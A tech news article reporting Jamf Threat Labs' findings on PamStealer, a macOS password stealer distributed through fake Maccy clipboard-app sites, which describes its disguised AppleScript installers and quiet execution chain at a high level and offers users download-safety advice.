Business

Dangerous New Mac Malware PamStealer Disguises Itself as a Popular Clipboard App to Steal Your Passwords

Published

on

SAN FRANCISCO — A sophisticated new strain of Mac malware is targeting users of one of the most popular third-party clipboard management utilities on macOS, impersonating the app through fake websites and disguised installer files to steal login passwords, according to a threat report published by mobile device management and security firm Jamf Threat Labs.

The malware, which Jamf researchers have named PamStealer, is being distributed through websites designed to mimic the legitimate website of Maccy, a widely used free open-source clipboard history tracker. Users who land on these fraudulent sites and attempt to download what they believe is a legitimate copy of the application instead receive malicious files engineered to compromise their system silently and extract sensitive authentication credentials.

PamStealer’s delivery mechanism relies on AppleScript files disguised as legitimate Maccy installer packages and distributed within disk images, a format Mac users commonly associate with trusted software installations. When a user opens and attempts to run the file, the script triggers a payload chain that begins tracking information on the targeted Mac and transmits collected data to an external threat actor controlling the attack.

The name PamStealer derives from the specific technique the malware uses to extract and validate a victim’s login password through macOS Pluggable Authentication Modules, known as PAM, the system-level authentication framework built into Apple’s operating system that handles credential verification across a wide range of login and privilege escalation scenarios.

Advertisement

What distinguishes PamStealer from earlier generations of Mac malware, according to Jamf’s analysis, is the technical sophistication of its execution chain and its deliberate effort to minimize the signals that conventional detection tools would typically catch. The malware does not use commonly flagged shell commands such as curl or zsh, which many Mac security tools have been trained to treat with suspicion. Instead, the AppleScript payload executes a self-contained JavaScript for Automation downloader that retrieves and stages the malicious payload using native Objective-C application programming interfaces, tools that are part of macOS’s own legitimate software development framework and therefore far less likely to trigger defensive alerts.

A Rust-based second-stage payload follows the initial download, with the combination of techniques producing what Jamf’s researchers described as a notably quiet and difficult-to-detect attack chain.

“Together, these behaviors illustrate how commodity macOS stealers continue to evolve, adopting quieter execution chains and native implementations that reduce traditional detection opportunities while remaining compatible with standard macOS features,” Jamf wrote in its report.

The researchers further noted that while disk images and AppleScript-based malware have both been established components of the Mac threat landscape for years, PamStealer represents a meaningful evolution in how those elements are combined. By pairing them with a local credential validation process through PAM rather than transmitting password attempts outward for external verification, the malware avoids generating the kind of outbound network traffic that endpoint detection tools often monitor for signs of malicious activity. The credential is tested locally against the Mac’s own authentication system before being exfiltrated, reducing the overall noise of the attack and making the infection harder to identify through conventional monitoring.

Advertisement

The Maccy application itself is not compromised. The malware is entirely external to the legitimate software and works solely by exploiting user trust in the Maccy brand and the app’s wide adoption among Mac power users. Maccy has built a following among enthusiasts and professionals because it provides clipboard history functionality that Apple only began offering natively in macOS Tahoe through an update to Spotlight, arriving years after third-party developers had already built dedicated tools to fill the gap. The combination of strong name recognition and a user base comfortable with installing non-App Store software made Maccy a strategically attractive brand for threat actors to impersonate.

To protect themselves from PamStealer specifically, Maccy users should only download the application directly from the official Maccy website, maccy.app, or from the application’s official GitHub repository. Both the official website and the GitHub page carry explicit disclaimers stating that maccy.app is the only official website for the application, a warning that the developer has apparently added in direct response to the emergence of impersonation sites targeting their user base. Any other website distributing a file claiming to be Maccy should be treated as suspect.

More broadly, the threat underscores a set of security habits that Apple, security researchers and enterprise IT teams consistently recommend to Mac users regardless of which application a specific attack happens to target. The safest pathway for obtaining Mac software remains the Mac App Store, where Apple reviews applications before making them available for download and applies a layer of technical sandboxing that limits what even legitimate apps can access on a user’s system. Software obtained directly from a developer through their official website carries somewhat more risk, though that risk is manageable when users take care to verify they are on the correct domain and not a lookalike site.

Users who receive messages containing links to software downloads from unfamiliar or unexpected sources should avoid clicking those links directly. A recommended approach involves Control-clicking any link or button to copy the actual URL before visiting it, then pasting the address into a text editor to inspect the full destination address before proceeding. Links in emails or text messages that claim to lead to known, trusted software download pages are a common vector for delivering malware through exactly the kind of impersonation technique PamStealer employs.

Advertisement

Mac users who want to assess their existing security posture can also consider running one of several reputable third-party Mac security tools that scan for known malware signatures and monitor for unusual system behavior, though Jamf’s report suggests that PamStealer’s design specifically targets detection gaps in conventional tools, making behavioral awareness and careful download hygiene the most reliable defenses for now.

PamStealer’s sophistication reflects a broader and well-documented trend in which Mac-targeted malware has grown significantly more advanced in recent years as the platform’s user base and commercial profile have expanded, attracting greater attention from financially motivated threat actors who once focused almost exclusively on Windows systems. The days when Mac users could rely on relative security through obscurity are long past, and the evolution documented in Jamf’s PamStealer report offers a clear illustration of why.

You must be logged in to post a comment Login

Leave a Reply

Cancel reply

Trending

Exit mobile version